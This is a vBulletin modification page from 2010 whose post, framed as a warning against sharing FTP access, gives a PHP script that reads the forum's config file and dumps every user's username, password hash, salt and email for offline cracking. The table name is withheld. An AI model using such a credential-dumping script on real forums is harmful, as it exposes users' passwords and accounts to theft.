Back to Modification Graveyard

vbulletin passwords, usernames & Emails Cracker .
Mod Version: 0.1, by Michael.A

This thread is in the Modification Graveyard.
vB Version: 3.8.x Rating: (0 vote - 0 average) Installs: 0
Released: 15 Jul 2010 Last Update: Never Downloads: 0
Not Supported  

ok am only showing you guy this so you know that giving ftp access to ur forum is a bad thing to do no mater how match you trust that person you should never do it,
i hop i dont get in trouble on vBulletin for showing you guys this.

here is goes nothing.
this is a php code am not going to show how to install it so dont ask me how to.

thats how it work it get the info off your DB and then with that info you u can use a program like Password Pro to get the password of the user info you pick...

there is a massing part am not giving that out that way i can know for sure u&i wont get in trouble.

PHP Code:
<?php
include("/home/******/public_html/forums/includes/config.php");
mysql_connect($config['MasterServer']['servername'], $config['MasterServer']['username'], $config['MasterServer']['password']) or die(mysql_error());
mysql_select_db($config['Database']['dbname']) or die(mysql_error());
$result mysql_query("SELECT * FROM ?????????")
or die(
mysql_error());
while(
$row mysql_fetch_array($resultMYSQL_ASSOC))
{
echo 
$row['username'].":".$row['password'].":".$row['salt']."::".$row['email']."<br>";
}
?>
Key Words of The Day: { Hashing, forum, users }

Download

No files for download.


vblts.ru supports vBulletin®, 2022-2024